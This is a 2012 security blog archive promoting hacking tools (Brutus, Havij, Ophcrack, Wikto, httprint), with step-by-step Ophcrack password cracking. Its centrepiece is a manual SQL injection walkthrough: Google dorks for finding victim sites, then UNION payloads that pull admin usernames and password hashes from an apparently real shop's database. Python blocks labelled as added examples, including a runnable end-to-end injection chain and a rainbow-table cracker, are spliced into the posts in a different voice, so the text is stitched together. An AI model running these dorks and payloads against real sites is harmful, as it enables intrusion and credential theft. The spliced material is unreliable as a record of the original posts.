Monday, April 30, 2012

Exploit-Me






Exploit-Me is a suite of Firefox web application security testing tools designed to be lightweight and easy to use.


The Exploit-Me series was originally introduced at the SecTor conference in Toronto. The slides for the presentation are available for download, and SecTor is also making the audio of the talk available.


XSS-Me
Cross-Site Scripting (XSS) is a common flaw in today's web applications, and XSS flaws can cause serious damage. Detecting XSS vulnerabilities early in the development process helps keep them out of the shipped application. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.


· Download XSS-Me Now!
· XSS-Me 0.4 release notes
· Get the source
· Read the FAQ to find out more
· Extended XSS string set


SQL Inject-Me
SQL Injection vulnerabilities can cause a lot of damage to a web application. A malicious user may be able to view records, delete records, drop tables or gain access to your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.


· Download SQL Inject-Me Now!
· SQL Inject-Me 0.4 release notes
· Get the source
· Read the FAQ to find out more


Access-Me
Access vulnerabilities in an application can allow an attacker to reach resources without being authenticated. Access-Me is the Exploit-Me tool used to test for access control vulnerabilities.
· Download Access-Me Now!
· Access-Me 0.2 release notes
· Get the source
· Read the FAQ to find out more


Website - Security Compass

Remote Password Cracker - BRUTUS




Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free.
It is available for Windows 9x, NT and 2000, there is no UNIX version available although it is a possibility at some point in the future.
Brutus was first made publicly available in October 1998.
Development continues so new releases will be available in the near future.
Features :
Brutus version AET2 is the current release and includes the following authentication types :
* HTTP (Basic Authentication)
* HTTP (HTML Form/CGI)
* POP3
* FTP
* SMB
* Telnet
Other types such as IMAP, NNTP, NetBus etc. are freely downloadable from this site and can simply be imported into your copy of Brutus. You can create your own types or use other people's.
The current release includes the following functionality :
* Multi-stage authentication engine
* 60 simultaneous target connections
* No username, single username and multiple username modes
* Password list, combo (user/password) list and configurable brute force modes
* Highly customizable authentication sequences
* Load and resume position
* Import and Export custom authentication types as BAD files seamlessly
* SOCKS proxy support for all authentication types
* User and password list generation and manipulation functionality
* HTML Form interpretation for HTML Form/CGI authentication types
* Error handling and recovery capability, including resume after crash/failure.


Friday, April 27, 2012

Havij v1.15 Advanced SQL Injection


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Given a vulnerable web application, Havij can fingerprint the back-end database, retrieve DBMS users and password hashes, enumerate and dump tables and columns, fetch data from the database, run SQL statements, and in some configurations read the underlying file system and execute commands on the operating system.

What sets Havij apart from similar tools, according to its developers, is its injection methods; they claim a success rate of more than 95% when injecting vulnerable targets.

Havij's user-friendly GUI (Graphical User Interface) and automated settings and detection make it usable even for inexperienced users.

What's New?
  • Webknight WAF bypass added.
  • Bypassing mod_security made better
  • Unicode support added
  • A new method for tables/columns extraction in mssql
  • Continuing previous tables/columns extraction made available
  • Custom replacement added to the settings
  • Default injection value added to the settings (when using %Inject_Here%)
  • Table and column prefix added for blind injections
  • Custom table and column list added.
  • Custom time out added.
  • A new md5 cracker site added
  • bugfix: a bug relating to the SELECT command
  • bugfix: finding string column
  • bugfix: getting multi column data in mssql
  • bugfix: finding mysql column count
  • bugfix: wrong syntax in injection string type in MsAccess
  • bugfix: false positive results removed
  • bugfix: data extraction in url-encoded pages
  • bugfix: loading saved projects
  • bugfix: some errors in data extraction in mssql fixed.
  • bugfix: a bug in MsAccess when guessing tables and columns
  • bugfix: a bug when using proxy
  • bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
  • bugfix: false positive in finding columns count
  • bugfix: when mssql error based method failed
  • bugfix: a bug in saving data
  • bugfix: Oracle and PostgreSQL detection

How to use

This tool is for exploiting SQL Injection bugs in web applications.
To use it you should know a little about SQL Injection.
Enter the target URL, select the HTTP method, then click Analyze.
Note: the URL should be a valid request that returns a normal page, not a 404 or error page.

Download Havij Free Version



Visit the official site for more information:
http://itsecteam.com/en/projects/project1.htm



OphCrack - Windows Password Recovery Tool


Ophcrack is a free, open source program that cracks Windows passwords using rainbow tables built for LM hashes (and, since version 2.3, NTLM hashes).

If you are locked out of a Windows account, Ophcrack can recover the password from the password hashes stored on the machine instead of resetting it.

Ophcrack can recover many passwords within a few minutes. The developers provide free tables for Windows XP and Windows Vista.

It runs on Windows, Mac OS X and Linux and is one of the most effective free Windows password recovery tools available. It cannot recover every password, though: a password that is not covered by the tables you have loaded will not be found.

Three free tables are available: two Windows XP tables, one small and one fast, and one Windows Vista table.

Ophcrack is also available as a Live CD, which automates retrieving the password hashes from the Windows installation and cracking them. The Live CD is built on SliTaz GNU/Linux and is downloaded as a single ISO file.

The free rainbow tables supplied by the developers are included on the Live CD. A rainbow table is not a list of guessed passwords; it is a precomputed set of hash chains that lets the cracker look a hash up far faster than brute force. The hashes themselves are read automatically from the SAM database of the Windows installation.

Download Ophcrack from the Ophcrack website; it is free and most useful when you have forgotten your own password.

Download Ophcrack

Step 1: Download the Live CD image from Ophcrack's website. There are two images, XP and Vista, so make sure you grab the right one. The Vista image works with Windows Vista and Windows 7; the only difference between the two is the rainbow tables Ophcrack uses to recover the password.

Step 2: Once the .iso file is downloaded, burn the Ophcrack ISO image to a CD.

Step 3: Restart the computer from the burned CD (change the boot order in the BIOS if the machine does not boot from CD by default).

Step 4: The Ophcrack Live CD boots on its own after the restart.

Step 5: When the logo screen appears, hit Enter.

Step 6: Once the Live CD system has finished loading, select the user account whose password you wish to recover and click Launch.

Step 7: Cracking proceeds at a speed that depends on your system; a recovered password is eventually displayed in the "NT Pwd" column. A password that is not covered by the loaded tables is reported as not found.

If you have forgotten a Windows 7 password, these steps let you recover it and regain access to the computer.


Ophcrack 3.4.0 released

 Ophcrack 3.4.0 released on April 27, 2012


After almost three years without news, here comes the version 3.4.0 of ophcrack. This will probably be the final release in the 3.x branch.
It adds the support of the soon to be released XP flash and Vista eight XL tables. On Windows it also adds the support of dumping the hashes through samdump2 live using NTFS low-level access to the locked files.
A new LiveCD will follow soon hopefully. Stay tuned!

What is Ophcrack

Ophcrack is a free open source (GPL licensed) program that cracks Windows passwords by using LM hashes through rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. On most computers, ophcrack can crack most passwords within a few minutes.[1]
Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. By default, ophcrack is bundled with tables that allow it to crack passwords no longer than 14 characters using only alphanumeric characters. Available for free download are two Windows XP tables, one small and one fast, and one Windows Vista table.[2]
Objectif Sécurité has even larger tables for purchase, intended for professional use.[3] Larger rainbow tables contain LM hashes of passwords with all printable characters, including symbols and spaces, and are available for purchase.[2]
Ophcrack is also available as Live CD distributions which automate the retrieval, decryption, and cracking of passwords from a Windows system. One Live CD distribution is available for Windows XP and lower, as well as another for Windows Vista and Windows 7.[4] The Live CD distributions of ophcrack are built with SliTaz GNU/Linux.


Starting with version 2.3, Ophcrack also cracks NTLM hashes. This is necessary if the generation of the LM hash is disabled (this is default for Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored).
Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Features :-
  • Runs on Windows, Linux/Unix, Mac OS X, …
  • Cracks LM and NTLM hashes.
  • Free tables available for Windows XP and Vista.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • Live CD available to simplify the cracking.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
  • Free and open source software (GPL).     
  • Download Ophcrack LiveCD
    The latest version of ophcrack LiveCD is 2.3.1 (including ophcrack 3.3.1)
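To make the rainbow-table idea behind Ophcrack concrete, here is a small added example (not code from Ophcrack or its authors) that builds a tiny table over a toy password space and then recovers a password from its hash by walking the chains. SHA-256 stands in for the LM/NTLM hash because LM needs DES, which the Python standard library does not provide; the charset, chain length, reduction function and chain start points are my own choices. The coverage() function shows why the free tables do not crack everything and why larger tables are sold.

```python
import hashlib
import itertools

# Added example (not Ophcrack code). Toy password space: 3 characters over
# "abcdef" (216 passwords). SHA-256 is a stand-in for the LM/NTLM hash;
# CHARSET, PW_LEN, CHAIN_LEN and R() are arbitrary choices for the demo.
CHARSET = "abcdef"
PW_LEN = 3
CHAIN_LEN = 10
SPACE = len(CHARSET) ** PW_LEN


def H(pw):
    """Hash function being attacked (stand-in for LM/NTLM)."""
    return hashlib.sha256(pw.encode()).digest()


def R(k, h):
    """Column-dependent reduction: maps a hash back to *some* password in the space.
    A different function per column is what makes this a rainbow table rather than
    a classic Hellman table: two chains only merge if they collide in the same column."""
    n = (int.from_bytes(h[:8], "big") + k) % SPACE
    out = []
    for _ in range(PW_LEN):
        n, d = divmod(n, len(CHARSET))
        out.append(CHARSET[d])
    return "".join(out)


def build_table(starts):
    """Precompute chains; only endpoint -> start points is stored, not the passwords in between."""
    table = {}
    for start in starts:
        p = start
        for k in range(CHAIN_LEN):
            p = R(k, H(p))
        table.setdefault(p, []).append(start)  # several chains may share an endpoint (a merge)
    return table


def lookup(table, target):
    """Recover the password for `target` if some stored chain passed through it."""
    for k in range(CHAIN_LEN - 1, -1, -1):
        # Assume the target sat at column k: walk the rest of the chain to its endpoint.
        x = R(k, target)
        for j in range(k + 1, CHAIN_LEN):
            x = R(j, H(x))
        for start in table.get(x, []):
            # Regenerate from the chain start up to column k and confirm (rules out false alarms).
            cand = start
            for j in range(k):
                cand = R(j, H(cand))
            if H(cand) == target:
                return cand
    return None


def coverage(table):
    """Fraction of the password space the table can crack: the reason bigger tables exist."""
    found = 0
    for t in itertools.product(CHARSET, repeat=PW_LEN):
        pw = "".join(t)
        if lookup(table, H(pw)) == pw:
            found += 1
    return found / SPACE


# Every fifth password as a chain start: far fewer stored entries than passwords.
STARTS = ["".join(t) for t in itertools.product(CHARSET, repeat=PW_LEN)][::5]

if __name__ == "__main__":
    table = build_table(STARTS)
    print("stored endpoints:", len(table), "of", SPACE, "passwords")
    print("coverage:", round(coverage(table), 2))
    print("cracked 'bad' ->", lookup(table, H("bad")))
```

The table stores roughly a fifth as many entries as there are passwords, yet lookup() still recovers a large fraction of them; a real Ophcrack table trades the same storage for far larger LM/NTLM password spaces, which is why a password outside the loaded tables (or longer than 14 characters for LM) simply comes back as not found.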

 


Source -











Thursday, April 26, 2012

Manual Sql Injection


 Manual Sql Injection Attack

SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Finding a site vulnerable to SQL injection:
To find candidate pages we use Google dorks such as the following:
inurl:index.php?id=  
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid= 


Step 1: Finding a Vulnerable Link -


Append a single quote to the parameter value, e.g. id=3'

If a SQL syntax error or a blank page comes back, the quote has broken the query and the parameter is probably injectable.

Step 2: Finding the Number of Columns -


order by 8 --

Increase the number in the ORDER BY clause until the page breaks. If order by 7 returns the normal page but order by 8 gives an error or a blank page, the query selects 7 columns. (In MySQL the -- comment marker must be followed by a space; in a URL use --+ or -- - so that the space survives.)

Step 3: Finding Which Columns Are Displayed:



union all select 1,2,3,4,5,6,7 --

Use a value of id that does not exist (for example id=-1) so the original row is not returned and only the injected row is shown. If the number 2 appears on the page, that column is rendered and can be used to return the database, table and column names.

Step 4: Finding the Database Name

union all select 1,database(),3,4,5,6,7 --

The page now shows the name of the current database, here:

chennaisilks

Step 5: Finding Table Names:


union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema='chennaisilks' --

table_schema is the database name returned in Step 4, and the select list must have the same number of columns found in Step 2. If the page only displays one row at a time, either append limit 0,1, limit 1,1 and so on to walk through the tables, or use group_concat(table_name) to get them all in one value.

Step 6: Finding Column Names:




union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='chennaisilks' and table_name='admin' --

Again table_schema is the database from Step 4; adding table_name restricts the listing to the table of interest.


Admin table is admin

Admin Columns are

admin_id
user_id
admin_pwd
admin_email
admin_last_login
admin_ip




Step 7: Finding the Admin Username & Password:


union all select 1,user_id,3,4,5,6,7 from admin --


union all select 1,admin_pwd,3,4,5,6,7 from admin --

The value in admin_pwd is usually a hash (MD5 is common in such applications) rather than the cleartext password, so it still has to be cracked before it can be used to log in.
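The whole procedure above, Steps 1 to 7, as an added runnable example that is not part of the original post. A throwaway SQLite database stands in for the page's MySQL target; the payloads are the same quote test, ORDER BY count and UNION extraction, but SQLite exposes its metadata through sqlite_master and pragma_table_info() instead of information_schema, and a comment marker needs no trailing space. The products and admin tables, the rendered page and the password hash are all constructed for the demo. The last function shows the fix a developer should apply: a parameterised query.

```python
import sqlite3

# Added example (not code from the page or any tool it describes). Constructed
# sample data; SQLite stands in for MySQL.

NCOLS_MAX = 20


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, stock INTEGER)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?, ?)",
                    [(1, "silk saree", 1200.0, 4), (2, "cotton shirt", 300.0, 10), (3, "scarf", 150.0, 25)])
    con.execute("CREATE TABLE admin (admin_id INTEGER, user_id TEXT, admin_pwd TEXT)")
    con.execute("INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')")  # md5('password')
    return con


def vulnerable_lookup(con, id_param):
    """The bug the page exploits: the request parameter is pasted straight into the SQL text."""
    sql = "SELECT id, name, price, stock FROM products WHERE id=" + id_param
    return con.execute(sql).fetchall()


def render_page(rows):
    """Stand-in for the web page, which displays only name and price (columns 2 and 3)."""
    return "\n".join(f"{r[1]} - {r[2]}" for r in rows)


def is_injectable(con, base="3"):
    """Step 1: a stray quote that breaks the statement proves the input reaches the SQL parser."""
    try:
        vulnerable_lookup(con, base + "'")
    except sqlite3.OperationalError:
        return True
    return False


def count_columns(con, base="3"):
    """Step 2: ORDER BY n errors once n exceeds the number of selected columns."""
    for n in range(1, NCOLS_MAX + 1):
        try:
            vulnerable_lookup(con, f"{base} ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def reflected_columns(con, ncols):
    """Step 3: UNION a row of numbered markers; the ones that show up on the page are usable."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = vulnerable_lookup(con, f"-1 UNION ALL SELECT {markers}--")  # -1: no real row matches
    shown = render_page(rows).split()
    return [i for i in range(1, ncols + 1) if str(i) in shown]


def union_extract(con, ncols, pos, expr, source):
    """Steps 4-7: place an expression in a reflected column and read it back, one value per row."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = expr
    rows = vulnerable_lookup(con, f"-1 UNION ALL SELECT {','.join(cols)} FROM {source}--")
    return [r[pos - 1] for r in rows]


def safe_lookup(con, id_param):
    """The fix: a parameterised query. The input can only ever be a value, never SQL."""
    return con.execute("SELECT id, name, price, stock FROM products WHERE id=?", (id_param,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    print("injectable:", is_injectable(con))
    ncols = count_columns(con)
    pos = reflected_columns(con, ncols)[0]
    print("tables:", union_extract(con, ncols, pos, "name", "sqlite_master WHERE type='table'"))
    print("admin columns:", union_extract(con, ncols, pos, "name", "pragma_table_info('admin')"))
    print("credentials:", union_extract(con, ncols, pos, "user_id || ':' || admin_pwd", "admin"))
    print("hardened:", safe_lookup(con, "-1 UNION ALL SELECT 1,2,3,4--"))
```

Run as a script it walks the chain end to end: the quote test raises, the ORDER BY probe stops at 4, the marker row shows that columns 2 and 3 reach the page, and the UNION payloads pull table names, the admin table's columns and the user_id:admin_pwd pair through column 2. The same payloads fed to safe_lookup() return an empty result because the driver binds them as a literal value.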


Source 

Tuesday, April 24, 2012

Wikto - Nikto for Windows


Wikto - Nikto for Windows with some extra features.

Author
Roelof Temmingh
Gareth Phillips < gareth(at)sensepost(dot)com >
Ian de Villiers < ian(at)sensepost(dot)com >

License, version & release date
License : GPLv3
Version : 2.1.0.0
Release Date : 2008/12/15

Description

Wikto is Nikto for Windows - but with a couple of fancy extra features including fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
Wikto lets you quickly and easily perform web server assessments.
Before we start we need to know what Wikto does and what it does not do. Wikto is not a web application scanner. It is totally unaware of the application (if any) that's running on the web site. So Wikto will not look for SQL injection problems, authorization problems etc. on a web site. It is also not a network level scanner, so it won't try to find open ports, or see if the web site is properly firewalled. Wikto rather operates between these two levels: it tries, for instance, to find interesting directories and files on the web site, it looks for sample scripts that can be abused, and it finds known vulnerabilities in the web server implementation itself. Oh, and Wikto is not just Nikto for Windows. The Nikto scan is only one of its many functions (and it performs the Nikto scans quite differently from how Nikto does).

Requirements

WinHTTrack (www.httrack.com)
HTTprint (www.net-square.com)
.Net Framework

Additional Resources

Httprint Web Server Fingerprinting tool


Httprint
An easy-to-use web server fingerprinting tool for pen testers, with both GUI and command-line versions.


Introduction

httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask. httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. httprint uses text signature strings and it is very easy to add signatures to the signature database.
More details on how httprint works can be found in the Introduction to HTTP fingerprinting paper.
Features
  • Identification of web servers despite the banner string and any other obfuscation. httprint can successfully identify the underlying web servers when their headers are mangled by patching the binary, by modules such as mod_security.c, or by commercial products such as ServerMask; the project site shows an example of httprint detecting disguised servers.
  • Inventorying of web enabled devices such as printers, routers, switches, wireless access points, etc. A sample HTML report is available on the project site.
  • Customisable web server signature database. To add new signatures, simply cut and paste the httprint output against unknown servers into the signatures text file.
  • Confidence Ratings. httprint now picks the best matches based on confidence ratings, derived using a fuzzy logic technique, instead of going by the highest weight. More details on the significance of confidence ratings can be found in section 8.4 of the Introduction to HTTP fingerprinting paper.
  • [new] Multi-threaded engine. httprint v301 is a complete re-write, featuring a multi-threaded scanner, to process multiple hosts in parallel. This greatly saves scanning time. *multi-threading is not yet supported in the FreeBSD version.
  • [new] SSL information gathering. httprint now gathers SSL certificate information, which helps you identify expired SSL certificates, ciphers used, certificate issuer, and other such SSL related details.
  • [new] Automatic SSL detection. httprint can detect if a port is SSL enabled or not, and can automatically switch to SSL connections when needed.
  • Automatic traversal of HTTP 301 and 302 redirects. Many servers who have transferred their content to other servers send a default redirect response towards all HTTP requests. httprint now follows the redirection and fingerprints the new server pointed to. This feature is enabled by default and can be turned off, if needed.
  • Ability to import web servers from nmap network scans. httprint can import nmap's xml output files.
  • Reports in HTML, CSV and XML formats.
  • Available on Linux, Mac OS X, FreeBSD (command line only) and Win32 (command line and GUI).
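To show why a changed Server banner does not fool a fingerprinting tool, here is an added example (not httprint code and not its signature database) that scores a raw HTTP response against a few server profiles using one of the signals such tools rely on: the order in which the server emits its response headers. The three header orderings are my own illustrative approximations of typical static-file responses, the similarity measure (longest common subsequence, normalised) is my choice, and both responses are constructed; httprint's real signatures are richer and, per its paper, also use how the server answers unusual requests.

```python
# Added example: header-order fingerprinting in the spirit of httprint.
# SIGNATURES are illustrative approximations, NOT httprint's database.
SIGNATURES = {
    "Apache": ["Date", "Server", "Last-Modified", "ETag", "Accept-Ranges",
               "Content-Length", "Content-Type"],
    "Microsoft-IIS": ["Content-Type", "Last-Modified", "Accept-Ranges", "ETag",
                      "Server", "Date", "Content-Length"],
    "nginx": ["Server", "Date", "Content-Type", "Content-Length",
              "Last-Modified", "Connection", "ETag", "Accept-Ranges"],
}


def parse_headers(raw):
    """Return (Server banner or None, header names in the order they were sent)."""
    head = raw.split("\r\n\r\n", 1)[0]
    names, banner = [], None
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        names.append(name.strip())
        if name.strip().lower() == "server":
            banner = value.strip()
    return banner, names


def lcs(a, b):
    """Length of the longest common subsequence: tolerant of inserted or missing headers."""
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b, 1):
            cur.append(prev[j - 1] + 1 if x == y else max(prev[j], cur[j - 1]))
        prev = cur
    return prev[-1]


def fingerprint(raw):
    """Score every signature by header-order similarity; return (best match, confidence, banner)."""
    banner, names = parse_headers(raw)
    scores = {srv: lcs(names, sig) / max(len(sig), len(names)) for srv, sig in SIGNATURES.items()}
    best = max(scores, key=scores.get)
    return best, round(scores[best], 2), banner


# Constructed response: the banner claims IIS, but the header order is Apache's.
SAMPLE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 30 Apr 2012 10:00:00 GMT\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Last-Modified: Sun, 29 Apr 2012 09:00:00 GMT\r\n"
    "ETag: \"abc-123\"\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 42\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed response with a truthful banner and nginx-style ordering.
NGINX_SAMPLE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.0.15\r\n"
    "Date: Mon, 30 Apr 2012 10:00:00 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 42\r\n"
    "Last-Modified: Sun, 29 Apr 2012 09:00:00 GMT\r\n"
    "Connection: keep-alive\r\n"
    "ETag: \"abc-123\"\r\n"
    "Accept-Ranges: bytes\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for name, raw in (("disguised", SAMPLE), ("honest", NGINX_SAMPLE)):
        best, conf, banner = fingerprint(raw)
        print(f"{name}: banner={banner!r} -> {best} (confidence {conf})")
```

For the disguised response the banner says Microsoft-IIS/6.0 while the ordering matches the Apache profile exactly, so the tool reports Apache with full confidence and the IIS profile scores well under half; ServerMask-style banner rewriting changes only the string, not the order in which the server's modules append headers.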
Downloads

httprint 301 (released on 22/12/05)

Platform                  Version  MD5
Win32 GUI and cmd line    301      a66408308c3f540030bbb0d59716b032
Linux                     301      af53704de9c1851bd439cbe3fab3e0ad
Mac OS X                  301      6b188cd60df6eca5409694fa40859f0d
FreeBSD                   301      d5efd9463f671ce92f50ce3222f1774e

Verify the MD5 of the archive you download against this list.


Usage

The Win32 GUI version is straightforward to use. The command-line syntax for the Win32, Linux, FreeBSD and Mac OS X versions is given in the project documentation.

Source